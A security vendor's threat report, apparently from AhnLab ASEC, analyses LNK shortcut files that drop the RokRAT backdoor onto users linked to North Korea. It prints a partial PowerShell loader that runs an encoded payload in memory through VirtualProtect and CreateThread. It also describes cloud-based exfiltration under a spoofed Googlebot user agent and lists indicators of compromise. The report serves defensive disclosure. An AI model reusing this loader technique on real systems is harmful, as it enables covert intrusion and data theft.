AhnLab SEcurity intelligence Center (ASEC) confirmed that abnormally sized link files (*.LNK) that spread backdoor-type malware are being steadily distributed. It is confirmed that the recently confirmed link file (*.LNK) is being distributed to domestic users, especially people related to North Korea. The confirmed LNK file name is as follows.
- National Information Academy 8th integrated course certificate (final version).lnk
- Gate access roster 2024.lnk
- Northeast Project (Congressional Research Service (CRS Report).lnk
- Equipment list.lnk
The confirmed LNK file contains a command to run Powershell through CMD and is confirmed to be similar to the ‘RokRAT malware distributed through link files (*.lnk): RedEyes (ScarCruft)’ [1] posted last year. do. This type is characterized by containing normal document files, script code, and malicious PE data inside the LNK file.
The brief operation process of the malware is as follows.
When executing the LNK file, a Powershell command is executed to create and execute a normal document file .
Afterwards, three files are created in the %public% folder. The names and functions of the files created at this time are as follows.
| file name | Location in LNK file | function |
|---|---|---|
| viewer.dat | 0x2BC97 (size:0xD9402) | Encoded RokRAT malware |
| search.dat | 0x105099 (size:0x5AA) | Run viewer.dat file |
| find.bat | 0x105643 (size:0x139) | Run search.dat file |
Table 1. List of files created
‘find.bat’, which is executed first, executes ‘search.dat’ through Powershell. ‘search.dat’ reads the ‘viewer.dat’ file and runs it in fileless format.
$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) {
[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);The data of ‘viewer.dat’ that was finally executed was RokRAT malware, a backdoor-type malware that utilizes the cloud API to collect user information and perform various malicious actions according to the attacker’s commands.
The collected information is sent to the attacker’s cloud server using cloud services such as pcloud and yandex DropBox. At this time, the UserAgent in the request header is disguised as Googlebot, and the cloud URL used is as shown in the table below.
- User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Table 2. Cloud URL details used
Malicious actions that can be executed according to the attacker’s commands are as follows.
- Command Execute command
- Collect directory listings
- Delete specific files (VBS, CMD, BAT, lnk extension) in the startup program folder.
- Collect startup folder list, %APPDATA% folder list, and recently used file list
- Collect PC information (system information, IP, router information, etc.)
In addition, various malicious actions can be performed, and the collected information is saved in the %TEMP% folder and then uploaded to the attacker’s cloud server. The attacker’s email address identified during the analysis process is as follows.
- tanessha.samuel@gmail[.]com
- tianling0315@gmail[.]com
- w.sarah0808@gmail[.]com
- softpower21cs@gmail[.]com
As ASEC has consistently shared malicious shortcut files through its blog, the distribution of such malware has been confirmed frequently. In particular, malicious code targeting people in the unification, military, and education fields has been consistently identified in the past, so special caution is required.
[File Diagnosis]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent. R579429 (2023.05.05.01)
[IoC]
b85a6b1eb7418aa5da108bc0df824fc0
358122718ba11b3e8bb56340dbe94f51
35441efd293d9c9fb4788a3f0b4f2e6b
68386fa9933b2dc5711dffcee0748 115 bd07b927bb765ccfc94fadbc912b0226 6e5e5ec38454ecf94e723897a42450ea 3114a3d092e269128f72cfd34812ddc8
bd98fe95107ed54df3c809d7925f2d2c